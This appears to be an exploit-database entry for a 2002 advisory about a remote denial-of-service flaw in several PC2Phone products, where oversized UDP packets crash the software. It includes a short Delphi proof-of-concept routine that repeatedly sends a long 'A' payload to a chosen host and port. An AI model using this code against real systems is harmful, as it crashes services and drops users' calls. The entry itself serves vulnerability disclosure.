Multiple PC2Phone Products Remote Denial of Service Vulnerability

vendor:

Multiple PC2Phone Products

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Multiple PC2Phone Products

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Multiple PC2Phone Products Remote Denial of Service Vulnerability

It has been reported that multiple PC2Phone products are prone to a remote denial of service condition. The problem is said to occur when processing excessive data passed to the programs via a UDP packet and could result in the product crashing. This could result in an established conversation prematurely ending, or potentially other attacks.

Mitigation:

Limit the amount of data that can be passed to the program via a UDP packet.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8523/info

It has been reported that multiple PC2Phone products are prone to a remote denial of service condition. The problem is said to occur when processing excessive data passed to the programs via a UDP packet and could result in the product crashing. This could result in an established conversation prematurely ending, or potentially other attacks.

The precise technical details regarding this issue are currently unknown, however as further information is made available this bid will be updated accordingly. 

procedure TForm1.Button1Click(Sender: TObject);
var C:string;
N:integer;
MyStream:TMemoryStream;
begin
Memo1.Lines.Add('start');
C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain
N:=strtoint(Edit4.Text);
NMUDP1.RemoteHost:=Edit1.Text;
NMUDP1.RemotePort:=strtoint(Edit2.Text);
MyStream:=TMemoryStream.Create;
try
MyStream.Write(C[1],Length(C));
for n:=1 to N do
begin
NMUDP1.SendStream(MyStream);
end;
finally
MyStream.Free;
end;
Memo1.Lines.Add('finish');
end;